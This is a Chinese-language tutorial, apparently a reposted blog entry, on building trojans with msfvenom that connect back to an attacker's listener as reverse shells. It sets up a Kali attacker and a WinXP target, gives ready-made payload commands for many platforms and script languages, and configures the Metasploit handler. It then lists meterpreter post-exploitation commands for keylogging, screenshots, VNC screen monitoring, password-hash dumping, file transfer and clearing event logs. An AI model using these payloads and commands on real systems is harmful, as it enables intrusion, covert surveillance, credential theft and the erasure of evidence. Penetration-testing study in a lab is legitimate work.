失眠网,内容丰富有趣,生活中的好帮手!
失眠网 > 利用msfvenom制作木马 并且反弹shell

利用msfvenom制作木马 并且反弹shell

时间:2024-07-09 21:45:36

相关推荐

利用msfvenom制作木马 并且反弹shell

反弹shell原理:

反弹shell是指控制端监听某个TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出传递到控制端的过程。

工具

msfvenom:“msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线. 目的:熟悉msfvenom生成木马程序过程,并执行和监听控制. 原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线.”

msfconsole:msfconsole是msf的命令行交互界面。在msfconsole中,可以实现对msf的完美操作,是一个msf的一体化操作接口,可以完全地利用msf中的各种功能,使用msfconsole特定的命令进行操作

虚拟机准备

攻击机:kali 192.168.31.24

靶机:winXP 192.168.31.141

攻击过程

各种系统对应的马

Linuxmsfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elfWindowsmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exeMacmsfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.machoWeb PayloadsPHPmsfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.phpcat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.phpASPmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.aspJSPmsfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jspWARmsfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war Scripting PayloadsPythonmsfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pyBashmsfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.shPerlmsfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

使用msfvenom生成木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.24 LPORT=4444 -f exe -o app.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.24 LPORT=4444 -f exe > app.exe

启动msfconsole进入metasploit开始监听

进入监听模块

use exploit/multi/handler

设置payload反弹shell(使用和木马相同的payload)

set payload windows/meterpreter/reverse_tcp

设置LHOST、LPORT参数

set LHOST 192.168.31.24(本地IP)set LPORT 4444(设置的端口)

查看设置是否成功

show options

开始攻击

run或者exploit

出现该界面,表示渗透成功,可以对测试机进行一波操作了

meterpreter下的命令

getwd 当前目录

dir 查看所有文件

cat c:\123.txt 查看文件123.txt内容(数据是字符串传递,所以加一个转义字符\)

search -f cmd.exe (搜索名为cmd.exe文件所在目录)

upload /root/桌面/backldoor.exe(要上传的文件) -> c:\(上传到的目录) 上传文件

download c:\123txt /root 下载文件

clearev 清除日志

getuid 当前用户

ps 查看所用进程

kill 杀死某个进程

sysinfo 系统信息

键盘记录

keyscan_start 开始键盘记录

keyscan_dump 查看结果

keyscan_stop

屏幕截图

screenshot

屏幕监控

run vnc

获取密文密码

hashdump

获取shell,进入cmd

shell

获取权限之后的操作-博客

获取shell,进入cmd

①输入shell 进入目标主机的cmd命令行②输入systeminfo 查看目标主机的系统信息③Ctrl+C退出到meterprete命令行

执行meterprete命令

④hashdump 获取目标主机的明文密码⑤run vnc 进行屏幕监控⑥clearev 清除日志

如果觉得《利用msfvenom制作木马 并且反弹shell》对你有帮助,请点赞、收藏,并留下你的观点哦!

本内容不代表本网观点和政治立场,如有侵犯你的权益请联系我们处理。
网友评论
网友评论仅供其表达个人看法,并不表明网站立场。